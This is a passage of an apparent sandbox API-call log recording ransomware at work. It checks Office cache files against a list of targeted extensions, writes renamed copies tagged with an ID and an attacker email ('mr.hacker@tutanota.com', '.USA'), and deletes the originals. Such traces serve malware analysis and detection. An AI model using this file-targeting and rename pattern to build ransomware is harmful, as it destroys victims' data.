(lpString=".7z") returned 3 [0034.359] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.359] lstrlenW (lpString=".dbf") returned 4 [0034.359] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.359] lstrlenW (lpString=".1cd") returned 4 [0034.359] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.359] lstrlenW (lpString=".jpg") returned 4 [0034.359] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.359] lstrlenW (lpString=".doc") returned 4 [0034.359] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString=".docx") returned 5 [0034.359] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.359] lstrlenW (lpString=".pdf") returned 4 [0034.359] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString=".xls") returned 4 [0034.359] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString=".xlsx") returned 5 [0034.359] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.359] lstrlenW (lpString=".ppt") returned 4 [0034.359] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.359] lstrlenW (lpString=".zip") returned 4 [0034.359] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.359] lstrlenW (lpString=".rar") returned 4 [0034.359] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString=".bz2") returned 4 [0034.359] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.359] lstrlenW (lpString=".7z") returned 3 [0034.359] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.360] lstrlenW (lpString=".dbf") returned 4 [0034.360] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.360] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.360] lstrlenW (lpString=".1cd") returned 4 [0034.360] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.360] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.360] lstrlenW (lpString=".jpg") returned 4 [0034.360] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.360] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.360] lstrlenW (lpString="WordMUI.xml") returned 11 [0034.360] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.360] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1800) returned 1 [0034.360] CloseHandle (hObject=0x15c) returned 1 [0034.360] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020 [0034.360] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.360] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.361] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.361] GetLastError () returned 0x0 [0034.361] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x708, lpOverlapped=0x0) returned 1 [0034.362] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x710, lpOverlapped=0x0) returned 1 [0034.363] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.363] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0034.363] SetEndOfFile (hFile=0x164) returned 1 [0034.364] CloseHandle (hObject=0x164) returned 1 [0034.364] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.364] SetEndOfFile (hFile=0x15c) returned 1 [0034.365] CloseHandle (hObject=0x15c) returned 1 [0034.365] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.365] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.365] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.365] lstrlenW (lpString=".doc") returned 4 [0034.365] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.365] lstrlenW (lpString=".docx") returned 5 [0034.366] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.366] lstrlenW (lpString=".pdf") returned 4 [0034.366] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.366] lstrlenW (lpString=".xls") returned 4 [0034.366] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.366] lstrlenW (lpString=".xlsx") returned 5 [0034.366] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.366] lstrlenW (lpString=".ppt") returned 4 [0034.366] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.366] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.366] lstrlenW (lpString=".zip") returned 4 [0034.366] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.366] lstrlenW (lpString=".rar") returned 4 [0034.366] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.366] lstrlenW (lpString=".bz2") returned 4 [0034.366] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.366] lstrlenW (lpString=".7z") returned 3 [0034.366] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.366] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.367] lstrlenW (lpString=".dbf") returned 4 [0034.367] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.367] lstrlenW (lpString=".1cd") returned 4 [0034.367] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.367] lstrlenW (lpString=".jpg") returned 4 [0034.367] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.367] lstrlenW (lpString=".doc") returned 4 [0034.367] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString=".docx") returned 5 [0034.367] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.367] lstrlenW (lpString=".pdf") returned 4 [0034.367] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString=".xls") returned 4 [0034.367] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString=".xlsx") returned 5 [0034.367] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.367] lstrlenW (lpString=".ppt") returned 4 [0034.367] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.367] lstrlenW (lpString=".zip") returned 4 [0034.367] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.367] lstrlenW (lpString=".rar") returned 4 [0034.367] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString=".bz2") returned 4 [0034.367] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString=".7z") returned 3 [0034.367] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.367] lstrlenW (lpString=".dbf") returned 4 [0034.368] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.368] lstrlenW (lpString=".1cd") returned 4 [0034.368] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.368] lstrlenW (lpString=".jpg") returned 4 [0034.368] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.368] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.368] lstrlenW (lpString="Proof.xml") returned 9 [0034.368] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.369] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1347) returned 1 [0034.369] CloseHandle (hObject=0x15c) returned 1 [0034.369] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 0x2020 [0034.369] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.369] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.369] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.369] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.369] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.370] GetLastError () returned 0x0 [0034.370] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x543, lpOverlapped=0x0) returned 1 [0034.371] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x550, lpOverlapped=0x0) returned 1 [0034.372] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.372] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.372] SetEndOfFile (hFile=0x164) returned 1 [0034.372] CloseHandle (hObject=0x164) returned 1 [0034.373] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.373] SetEndOfFile (hFile=0x15c) returned 1 [0034.374] CloseHandle (hObject=0x15c) returned 1 [0034.374] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.374] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0034.374] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.374] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.374] lstrlenW (lpString=".doc") returned 4 [0034.374] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.374] lstrlenW (lpString=".docx") returned 5 [0034.374] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.374] lstrlenW (lpString=".pdf") returned 4 [0034.374] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.374] lstrlenW (lpString=".xls") returned 4 [0034.374] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.374] lstrlenW (lpString=".xlsx") returned 5 [0034.375] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.375] lstrlenW (lpString=".ppt") returned 4 [0034.375] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.375] lstrlenW (lpString=".zip") returned 4 [0034.375] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.375] lstrlenW (lpString=".rar") returned 4 [0034.375] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".bz2") returned 4 [0034.375] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".7z") returned 3 [0034.375] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.375] lstrlenW (lpString=".dbf") returned 4 [0034.375] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.375] lstrlenW (lpString=".1cd") returned 4 [0034.375] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.375] lstrlenW (lpString=".jpg") returned 4 [0034.375] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.375] lstrlenW (lpString=".doc") returned 4 [0034.375] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".docx") returned 5 [0034.375] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.375] lstrlenW (lpString=".pdf") returned 4 [0034.375] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".xls") returned 4 [0034.375] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".xlsx") returned 5 [0034.375] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.376] lstrlenW (lpString=".ppt") returned 4 [0034.376] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.376] lstrlenW (lpString=".zip") returned 4 [0034.376] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.376] lstrlenW (lpString=".rar") returned 4 [0034.376] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString=".bz2") returned 4 [0034.376] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString=".7z") returned 3 [0034.376] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.376] lstrlenW (lpString=".dbf") returned 4 [0034.376] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.376] lstrlenW (lpString=".1cd") returned 4 [0034.376] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.376] lstrlenW (lpString=".jpg") returned 4 [0034.376] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.376] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.376] lstrlenW (lpString="Proof.xml") returned 9 [0034.376] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.376] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1457) returned 1 [0034.377] CloseHandle (hObject=0x15c) returned 1 [0034.377] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 0x2020 [0034.377] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.377] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.377] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.377] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.377] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.377] GetLastError () returned 0x0 [0034.377] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x5b1, lpOverlapped=0x0) returned 1 [0034.506] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0034.526] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.526] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.527] SetEndOfFile (hFile=0x164) returned 1 [0034.527] CloseHandle (hObject=0x164) returned 1 [0034.527] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.527] SetEndOfFile (hFile=0x15c) returned 1 [0034.528] CloseHandle (hObject=0x15c) returned 1 [0034.528] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.528] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0034.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.529] lstrlenW (lpString=".doc") returned 4 [0034.529] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString=".docx") returned 5 [0034.529] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.529] lstrlenW (lpString=".pdf") returned 4 [0034.529] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString=".xls") returned 4 [0034.529] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString=".xlsx") returned 5 [0034.529] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.529] lstrlenW (lpString=".ppt") returned 4 [0034.529] 